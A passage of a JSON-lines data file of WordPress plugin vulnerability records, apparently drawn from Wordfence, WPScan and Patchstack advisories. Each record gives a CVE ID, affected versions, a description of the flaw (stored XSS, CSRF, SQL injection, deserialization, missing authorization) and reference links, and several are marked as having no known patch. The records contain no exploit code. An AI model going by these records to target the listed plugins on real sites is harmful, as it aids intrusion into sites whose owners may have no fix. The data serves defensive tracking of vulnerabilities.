replacement.","refs":"[{\"url\":\"http:\\\/\\\/localhost:1337\\\/wp-content\\\/plugins\\\/ap-plugin-scripteo\\\/lib\\\/BSA_PRO_Model.php\",\"name\":\"http:\\\/\\\/localhost:1337\\\/wp-content\\\/plugins\\\/ap-plugin-scripteo\\\/lib\\\/BSA_PRO_Model.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c5e4e1e3-61a6-4c37-80dd-93b5cea440e3?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c5e4e1e3-61a6-4c37-80dd-93b5cea440e3?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-3568","slug":"imagemagick-engine","description":"The ImageMagick Engine plugin for WordPress is vulnerable to deserialization of untrusted input via the 'cli_path' parameter in versions up to, and including 1.7.5. This makes it possible for unauthenticated users to call files using a PHAR wrapper, granted they can trick a site administrator into performing an action such as clicking on a link, that will deserialize and call arbitrary PHP Objects that can be used to perform a variety of malicious actions granted a POP chain is also present. It also requires that the attacker is successful in uploading a file with the serialized payload.","refs":"[{\"url\":\"https:\\\/\\\/github.com\\\/orangelabweb\\\/imagemagick-engine\\\/blob\\\/v.1.7.2\\\/imagemagick-engine.php#L529\",\"name\":\"https:\\\/\\\/github.com\\\/orangelabweb\\\/imagemagick-engine\\\/blob\\\/v.1.7.2\\\/imagemagick-engine.php#L529\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4a2ca2f0-1d4a-4614-86ba-a46e765f4a9f\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4a2ca2f0-1d4a-4614-86ba-a46e765f4a9f\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/github.com\\\/orangelabweb\\\/imagemagick-engine\\\/blob\\\/1.7.4\\\/imagemagick-engine.php#L529\",\"name\":\"https:\\\/\\\/github.com\\\/orangelabweb\\\/imagemagick-engine\\\/blob\\\/1.7.4\\\/imagemagick-engine.php#L529\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2801283%40imagemagick-engine&new=2801283%40imagemagick-engine&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2801283%40imagemagick-engine&new=2801283%40imagemagick-engine&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2277","slug":"wpdirectorykit","versionImpact":"1.1.9","description":"The WP Directory Kit plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.1.9. This is due to missing or incorrect nonce validation on the 'insert' function. This makes it possible for unauthenticated attackers to update the plugin's settings and inject malicious JavaScript via a forged request, granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2904689\\\/wpdirectorykit\\\/trunk\\\/application\\\/controllers\\\/Wdk_resultitem.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2904689\\\/wpdirectorykit\\\/trunk\\\/application\\\/controllers\\\/Wdk_resultitem.php\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpdirectorykit\\\/tags\\\/1.1.8\\\/application\\\/views\\\/wdk_resultitem\\\/resultitem_edit.php#L34\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpdirectorykit\\\/tags\\\/1.1.8\\\/application\\\/views\\\/wdk_resultitem\\\/resultitem_edit.php#L34\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/82c6ed2f-20e8-46d1-a460-16d32b7536cd?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/82c6ed2f-20e8-46d1-a460-16d32b7536cd?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1277","slug":"ocean-extra","versionImpact":"2.2.4","description":"The Ocean Extra plugin for WordPress is vulnerable to Stored Cross-Site Scripting via custom fields in all versions up to, and including, 2.2.4 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor access or higher, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5458e3bf-fd91-4201-8157-572eb1126aaf?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5458e3bf-fd91-4201-8157-572eb1126aaf?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ocean-extra\\\/trunk\\\/includes\\\/post-settings\\\/apply-settings.php#L750\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ocean-extra\\\/trunk\\\/includes\\\/post-settings\\\/apply-settings.php#L750\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ocean-extra\\\/trunk\\\/includes\\\/post-settings\\\/apply-settings.php#L756\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ocean-extra\\\/trunk\\\/includes\\\/post-settings\\\/apply-settings.php#L756\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3035534%40ocean-extra%2Ftrunk&old=3008053%40ocean-extra%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3035534%40ocean-extra%2Ftrunk&old=3008053%40ocean-extra%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6785","slug":"download-manager","versionImpact":"3.2.84","description":"The Download Manager plugin for WordPress is vulnerable to unauthorized file download of files added via the plugin in all versions up to, and including, 3.2.84. This makes it possible for unauthenticated attackers to download files added with the plugin (even when privately published).","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7b3608ca-8ed6-46ff-8e57-d8b68f91b9f2?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7b3608ca-8ed6-46ff-8e57-d8b68f91b9f2?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3038209%40download-manager%2Ftrunk&old=3022104%40download-manager%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3038209%40download-manager%2Ftrunk&old=3022104%40download-manager%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1677","slug":"a4-barcode-generator","versionImpact":"3.4.6","description":"The Print Labels with Barcodes. Create price tags, product labels, order labels for WooCommerce plugin for WordPress is vulnerable to unauthorized access of data, modification of data, and loss of data due to an improper capability check on 42 separate AJAX functions in all versions up to, and including, 3.4.6. This makes it possible for authenticated attackers, with subscriber access and above, to fully control the plugin which includes the ability to modify plugin settings and profiles, and create, edit, retrieve, and delete templates and barcodes.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6e15d285-aa1d-461d-bdc2-642e7ccd789b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6e15d285-aa1d-461d-bdc2-642e7ccd789b?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/a4-barcode-generator\\\/trunk\\\/class\\\/Request.php?rev=2870656\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/a4-barcode-generator\\\/trunk\\\/class\\\/Request.php?rev=2870656\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4783","slug":"jquery-t-countdown-widget","versionImpact":"2.3.25","description":"The jQuery T(-) Countdown Widget plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's tminus shortcode in all versions up to, and including, 2.3.25 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/78eeef12-123b-42f6-b446-c3f2d43153fd?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/78eeef12-123b-42f6-b446-c3f2d43153fd?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/jquery-t-countdown-widget\\\/trunk\\\/countdown-timer.php#L768\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/jquery-t-countdown-widget\\\/trunk\\\/countdown-timer.php#L768\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7092","slug":"essential-addons-for-elementor-lite","versionImpact":"5.9.27","description":"The Essential Addons for Elementor \u2013 Best Elementor Templates, Widgets, Kits & WooCommerce Builders plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018no_more_items_text\u2019 parameter in all versions up to, and including, 5.9.27 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/718c60c1-6117-4959-a907-d0ef457f7185?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/718c60c1-6117-4959-a907-d0ef457f7185?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/essential-addons-for-elementor-lite\\\/trunk\\\/includes\\\/Elements\\\/Filterable_Gallery.php#L3879\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/essential-addons-for-elementor-lite\\\/trunk\\\/includes\\\/Elements\\\/Filterable_Gallery.php#L3879\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/essential-addons-for-elementor-lite\\\/trunk\\\/includes\\\/Elements\\\/Filterable_Gallery.php#L3900\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/essential-addons-for-elementor-lite\\\/trunk\\\/includes\\\/Elements\\\/Filterable_Gallery.php#L3900\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/essential-addons-for-elementor-lite\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/essential-addons-for-elementor-lite\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/essential-addons.com\\\/changelog\\\/\",\"name\":\"https:\\\/\\\/essential-addons.com\\\/changelog\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3134194\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3134194\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8054","slug":"mm-breaking-news","versionImpact":"0.7.9","description":"The MM-Breaking News WordPress plugin through 0.7.9 does not have CSRF check in some places, and is missing sanitisation as well as escaping, which could allow attackers to make logged in admin add Stored XSS payloads via a CSRF attack.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/f27deffc-9555-44bf-8dee-1891c210ecfd\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/f27deffc-9555-44bf-8dee-1891c210ecfd\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-23510","slug":"wordpress-logging-service","versionImpact":"1.5.4","description":"Cross-Site Request Forgery (CSRF) vulnerability in Zaantar WordPress Logging Service allows Stored XSS. This issue affects WordPress Logging Service: from n\/a through 1.5.4.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/wordpress-logging-service\\\/vulnerability\\\/wordpress-wordpress-logging-service-plugin-1-5-4-csrf-to-stored-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/wordpress-logging-service\\\/vulnerability\\\/wordpress-wordpress-logging-service-plugin-1-5-4-csrf-to-stored-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13717","slug":"lead-capturing-call-to-actions-by-vcita","versionImpact":"2.7.1","description":"The Contact Form and Calls To Action by vcita plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the vcita_ajax_toggle_ae and vcita_ajax_toggle_contact functions in all versions up to, and including, 2.7.1. This makes it possible for authenticated attackers, with subscriber-level access and above, to enable and disable widgets.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/lead-capturing-call-to-actions-by-vcita\\\/trunk\\\/vcita-ajax-function.php#L5\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/lead-capturing-call-to-actions-by-vcita\\\/trunk\\\/vcita-ajax-function.php#L5\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/93800bd9-5d11-4d5b-99b2-4c5c78510af7?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/93800bd9-5d11-4d5b-99b2-4c5c78510af7?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-2573","slug":"amazing-service-box-visual-composer-addons","versionImpact":"2.0.0","description":"The Amazing service box Addons For WPBakery Page Builder (formerly Visual Composer) plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 2.0.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/amazing-service-box-visual-composer-addons\\\/trunk\\\/asb_addon.php#L114\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/amazing-service-box-visual-composer-addons\\\/trunk\\\/asb_addon.php#L114\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/amazing-service-box-visual-composer-addons\\\/trunk\\\/asb_addon.php#L45\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/amazing-service-box-visual-composer-addons\\\/trunk\\\/asb_addon.php#L45\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/amazing-service-box-visual-composer-addons\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/amazing-service-box-visual-composer-addons\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a4f6ce4d-6ca5-4a62-ae84-9dd190fc0392?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a4f6ce4d-6ca5-4a62-ae84-9dd190fc0392?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8700","slug":"event-calendars","versionImpact":"1.0.4","description":"The Event Calendar WordPress plugin through 1.0.4 does not check for authorization on delete actions, allowing unauthenticated users to delete arbitrary calendars.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/8c48b657-afa1-45e6-ada6-27ee58185143\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/8c48b657-afa1-45e6-ada6-27ee58185143\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-4963","slug":"wpextended","versionImpact":"3.0.15","description":"The WP Extended plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 3.0.15 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3300818\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3300818\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wpextended\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wpextended\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wpextended.io\\\/module_resources\\\/svg-file-upload\\\/\",\"name\":\"https:\\\/\\\/wpextended.io\\\/module_resources\\\/svg-file-upload\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/eabdd744-1a72-40f2-b569-f56a1b913273?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/eabdd744-1a72-40f2-b569-f56a1b913273?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0395","slug":"menu-shortcode","versionImpact":"1.0","description":"The menu shortcode WordPress plugin through 1.0 does not validate and escape some of its block options before outputting them back in a page\/post where the block is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/3f2565cd-7050-4ebd-9a50-cd9b9f7c3341\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/3f2565cd-7050-4ebd-9a50-cd9b9f7c3341\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4676","slug":"osm","versionImpact":"6.01","description":"The OSM WordPress plugin through 6.01 does not validate and escape some of its shortcode attributes, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attack.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/1df3c17c-990d-4074-b1d5-b26da880d88e\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/1df3c17c-990d-4074-b1d5-b26da880d88e\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1276","slug":"essential-addons-for-elementor-lite","versionImpact":"5.9.8","description":"The Essential Addons for Elementor \u2013 Best Elementor Templates, Widgets, Kits & WooCommerce Builders plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Content Ticker arrow attribute in all versions up to, and including, 5.9.8 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor access or above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/af8bee01-15bc-485e-8b01-8b68b199b34d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/af8bee01-15bc-485e-8b01-8b68b199b34d?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/essential-addons-for-elementor-lite\\\/tags\\\/5.9.8\\\/includes\\\/Elements\\\/Content_Ticker.php#L815\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/essential-addons-for-elementor-lite\\\/tags\\\/5.9.8\\\/includes\\\/Elements\\\/Content_Ticker.php#L815\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3034127%40essential-addons-for-elementor-lite%2Ftrunk&old=3029928%40essential-addons-for-elementor-lite%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3034127%40essential-addons-for-elementor-lite%2Ftrunk&old=3029928%40essential-addons-for-elementor-lite%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4486","slug":"awesome-contact-form7-for-elementor","versionImpact":"3.0","description":"The Awesome Contact Form7 for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'AEP Contact Form 7' widget in all versions up to, and including, 2.9 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0687e101-3c96-4c9b-941a-1b0fed2f76e2?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0687e101-3c96-4c9b-941a-1b0fed2f76e2?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/awesome-contact-form7-for-elementor\\\/trunk\\\/widgets\\\/aep-contact-form7.php#L819\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/awesome-contact-form7-for-elementor\\\/trunk\\\/widgets\\\/aep-contact-form7.php#L819\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5329","slug":"unlimited-elements-for-elementor","versionImpact":"1.5.109","description":"The Unlimited Elements For Elementor (Free Widgets, Addons, Templates) plugin for WordPress is vulnerable to blind SQL Injection via the \u2018data[addonID]\u2019 parameter in all versions up to, and including, 1.5.109 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for authenticated attackers, with Contributor-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f33d77b7-5412-47bf-9bed-8617151723c9?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f33d77b7-5412-47bf-9bed-8617151723c9?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/unlimited-elements-for-elementor\\\/trunk\\\/inc_php\\\/unitecreator_addons.class.php#L999\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/unlimited-elements-for-elementor\\\/trunk\\\/inc_php\\\/unitecreator_addons.class.php#L999\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3097249\\\/#file6\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3097249\\\/#file6\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/unlimited-elements-for-elementor\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/unlimited-elements-for-elementor\\\/#developers\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7862","slug":"blogintroduction-wordpress-plugin","versionImpact":"0.3.0","description":"The blogintroduction-wordpress-plugin WordPress plugin through 0.3.0 does not have CSRF check in place when updating its settings, which could allow attackers to make a logged in admin change them via a CSRF attack","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/9b54cd05-3bb8-4bb9-a0e4-fb00d97d5cae\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/9b54cd05-3bb8-4bb9-a0e4-fb00d97d5cae\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10176","slug":"compact-wp-audio-player","versionImpact":"1.9.13","description":"The Compact WP Audio Player plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's \r\nsc_embed_player shortcode in all versions up to, and including, 1.9.13 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bba90659-09a8-470a-91d3-d1986562672a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bba90659-09a8-470a-91d3-d1986562672a?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/compact-wp-audio-player\\\/trunk\\\/shortcodes-functions.php#L79\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/compact-wp-audio-player\\\/trunk\\\/shortcodes-functions.php#L79\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/compact-wp-audio-player\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/compact-wp-audio-player\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3173541\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3173541\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12445","slug":"rightmessage","versionImpact":"0.9.7","description":"The RightMessage WP plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'rm_area' shortcode in all versions up to, and including, 0.9.7 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/rightmessage\\\/trunk\\\/includes\\\/class-rightmessage.php#L45\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/rightmessage\\\/trunk\\\/includes\\\/class-rightmessage.php#L45\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/rightmessage\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/rightmessage\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/efbbb33d-28ed-47f4-a8dd-2fc7564d9df2?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/efbbb33d-28ed-47f4-a8dd-2fc7564d9df2?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
